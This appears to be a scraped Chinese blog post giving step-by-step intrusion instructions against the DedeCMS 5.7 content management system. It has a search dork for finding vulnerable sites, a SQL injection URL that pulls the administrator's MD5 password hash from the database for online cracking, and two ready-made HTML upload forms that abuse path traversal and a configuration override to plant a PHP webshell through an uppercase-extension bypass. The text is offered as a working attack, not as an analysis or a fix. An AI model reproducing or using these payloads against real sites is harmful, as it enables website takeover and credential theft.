dede入侵步驟

--------------------------------------------------------
情簡單整理下入侵測試的步驟:
漏洞利用實例
百度搜索關鍵字"Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc",得到使用DeDeCMS系統的網站。
注入漏洞。首先訪問"/data/admin/ver.txt"頁面獲取系統最後升級時間,XXXXX說明已經修補2011年8月12日補丁, php

而後訪問"/member/ajax_membergroup.php?action=post&membergroup=1"頁面,XXXXXX2說明存在該漏洞。
因而訪問頁面連接"/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`",
去掉前三位和最後一位,獲得管理員的16位MD5碼,www.cmd5.com在線破解成功。 ajax


上傳漏洞。post

要求網站開啓新會員註冊功能,首先註冊新會員,無需經過郵件驗證,只要登錄會員中心,而後訪問頁面連接
"/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post",
說明經過"/plus/carbuyaction.php"已經成功調用了上傳頁面"/dialog/select_soft_post" 測試

因而將Php一句話木馬擴展名改成"rar"等,利用提交頁面upload1.htm, 網站

將下面的源碼另存爲upload1.htm,得到提交頁面如圖下。
<form action="[url=http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post]
http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post[/url]" method="post"
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
1,必須登錄用戶。
2,將待上傳PHP文件擴展名改成"zip|gz|rar|iso|doc|xsl|ppt|wps"其中之一。
3,newname爲上傳後的新文件名,擴展名使用大寫繞過,如"Php" url


提交後儘管頁面出錯,可是myfile.Php文件已經成功上傳到網站根目錄。code


upload2.htm
<form name="form1" action="http://127.1/member/uploads_add.php" method="post" enctype="multipart/form-data" >
<input type="hidden" name="mediatype" value="4" />
<input type="hidden" name="_GET[cfg_mb_addontype]" value="P hp|Php|php" />
<input type="hidden" name="dopost" value="save" />
<input name="addonfile" type="file" id="addonfile" />
<button class="button2" type="submit" >提交</button>
</form>orm

相關文章
相關標籤/搜索